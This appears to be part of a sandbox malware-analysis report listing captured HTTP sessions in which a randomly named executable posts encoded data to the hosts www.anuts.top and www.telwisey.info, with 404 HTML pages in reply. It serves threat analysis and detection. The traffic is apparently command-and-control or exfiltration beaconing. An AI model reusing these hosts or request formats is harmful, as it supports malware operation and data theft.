                      Data Ascii: 66s0QHx=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l3f0UaFictFtby9pxtQtHlbTx9corIkwEAkwgNfg=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.54973423.251.54.212806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:08.093244076 CEST786OUTPOST /li0t/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.anuts.top
                      Origin: http://www.anuts.top
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.anuts.top/li0t/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 2f 4a 74 50 67 63 5a 55 52 74 61 48 67 51 54 49 31 2b 34 5a 50 4e 78 57 78 32 47 73 4b 52 52 70 78 57 42 6e 32 72
                      Data Ascii: 66s0QHx=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27/JtPgcZURtaHgQTI1+4ZPNxWx2GsKRRpxWBn2r


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.54973523.251.54.212806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:10.629173994 CEST1803OUTPOST /li0t/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.anuts.top
                      Origin: http://www.anuts.top
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.anuts.top/li0t/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6c 38 6e 35 39 56 54 6a 43 70 75 6f 34 50 65 69 74 34 62 65 42 70 6a 58 55 49 6e 58 62 68 73 38 6f 48 6e 38 6a 46 4d 4d 75 58 41 50 39 46 36 50 68 6e 36 66 6f 75 73 53 6a 61 63 70 4b 56 4c 72 6b 39 52 38 49 70 6c 73 38 61 76 76 74 45 49 53 7a 46 68 41 47 41 32 74 6a 6d 49 57 7a 30 74 52 38 78 42 67 70 71 68 67 49 4c 43 78 2b 70 78 58 70 61 63 36 47 42 79 4a 42 77 37 2b 51 30 57 6b 56 6c 78 6b 77 4b 30 77 78 50 63 51 56 77 71 75 45 48 36 42 47 69 76 68 36 51 68 6a 30 77 57 76 58 [TRUNCATED]
                      Data Ascii: 66s0QHx=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1l8n59VTjCpuo4Peit4beBpjXUInXbhs8oHn8jFMMuXAP9F6Phn6fousSjacpKVLrk9R8Ipls8avvtEISzFhAGA2tjmIWz0tR8xBgpqhgILCx+pxXpac6GByJBw7+Q0WkVlxkwK0wxPcQVwquEH6BGivh6Qhj0wWvXoCRXaUrrN7YQXJ/GuPImg55fG3AExOdmINo9DVLDXRcO/2I8HC0HYrv4+fmcOX8piS8sCU0uhpKti2EgLe0WLV/iHP2PK1DQWBVbDcMbMek3uP6FFcrehRIc1lpSALltcIJmFOfPoOD/a+LUH77hpy28hqPXwLU82gMH1P39/llLoY/VdVQJXXi6Fk8ZojaliKH3FtX1865H8+BGt5452TPRD8rcq5c8nBJEif60cNi4RWmUj9q1SkEjUpm2b0ypgPZTVtgtjsOpA7SZ6Rh7F5ZCGhzdmbcz9lWr/U2l1NfJUjqBfH5X3VYfSD9PXdaCNHxr2aFOLqMZZpcjAI7N1WF6H+fW9J9HhL0QkXp8AArWwHSjVbuP/f+WXw9xsUmX2gpNmrWBy1Kh/ilwv15YFQZXxbmy2gmmi7D9q4eee8DjTpaJc5b9Kq2/d6YLVXBMosuxibF6JIuczLCjUz7oTiBMViyJRbkNEKjgaRJcnXN167XV5YUZRAlp/hA/yg0qqoyoI2++/aBduW59ziHqhdTJQ+5u1yjIIt7n2YeUi4cffD5HQt1adobB/9VWtrCTl91MOqytrRpfrRD7ZHs9V2+Q0kQEoRPT6nMGzqTw7r6sGrgtdGROS78xZWBQeqQSe7qiLFbkRWdNwu8mivjtT3i2+RKgq8Y0o7 [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.54973623.251.54.212806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:13.175820112 CEST519OUTGET /li0t/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.anuts.top
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.549737199.192.19.19806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:39.655225992 CEST778OUTPOST /ei85/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.telwisey.info
                      Origin: http://www.telwisey.info
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.telwisey.info/ei85/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 75 7a 58 39 30 6c 32 6c 59 6f 33 39 34 2f 31 37 62 5a 4c 58 66 34 57 65 6a 4d 2f 35 79 44 74 6c 30 59 6b 69 44 55 3d
                      Data Ascii: 66s0QHx=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34uzX90l2lYo394/17bZLXf4WejM/5yDtl0YkiDU=
                      Jul 2, 2024 07:17:40.264354944 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:40 GMT
                      Server: Apache
                      Content-Length: 16026
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                      Jul 2, 2024 07:17:40.264661074 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                      Jul 2, 2024 07:17:40.264672041 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                      Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                      Jul 2, 2024 07:17:40.264842033 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                      Jul 2, 2024 07:17:40.264853001 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                      Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                      Jul 2, 2024 07:17:40.264863968 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                      Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                      Jul 2, 2024 07:17:40.264873981 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                      Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                      Jul 2, 2024 07:17:40.265302896 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                      Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                      Jul 2, 2024 07:17:40.265314102 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                      Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                      Jul 2, 2024 07:17:40.265325069 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                      Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
                      Jul 2, 2024 07:17:40.275130033 CEST1236INData Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20
                      Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.549738199.192.19.19806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:42.185389042 CEST798OUTPOST /ei85/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.telwisey.info
                      Origin: http://www.telwisey.info
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.telwisey.info/ei85/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 55 75 4f 77 45 49 6f 43 69 45 2f 58 49 55 38 55 44 58 44 43 75 51 39 6a 6d 55 4d 46 70 44 51 41 6c 54 64 4c 35 36
                      Data Ascii: 66s0QHx=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/UuOwEIoCiE/XIU8UDXDCuQ9jmUMFpDQAlTdL56
                      Jul 2, 2024 07:17:43.050575018 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:42 GMT
                      Server: Apache
                      Content-Length: 16026
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                      Jul 2, 2024 07:17:43.050594091 CEST224INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705
                      Jul 2, 2024 07:17:43.050602913 CEST1236INData Raw: 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22
                      Data Ascii: ,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet"> <circle fil
                      Jul 2, 2024 07:17:43.050851107 CEST1236INData Raw: 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: 8-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                      Jul 2, 2024 07:17:43.050862074 CEST1236INData Raw: 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20 79 31 3d 22 31 34 33 2e 33 34 39 22
                      Data Ascii: necap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="rou
                      Jul 2, 2024 07:17:43.050873995 CEST672INData Raw: 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                      Data Ascii: 4" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g> <g>
                      Jul 2, 2024 07:17:43.051343918 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                      Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                      Jul 2, 2024 07:17:43.051356077 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
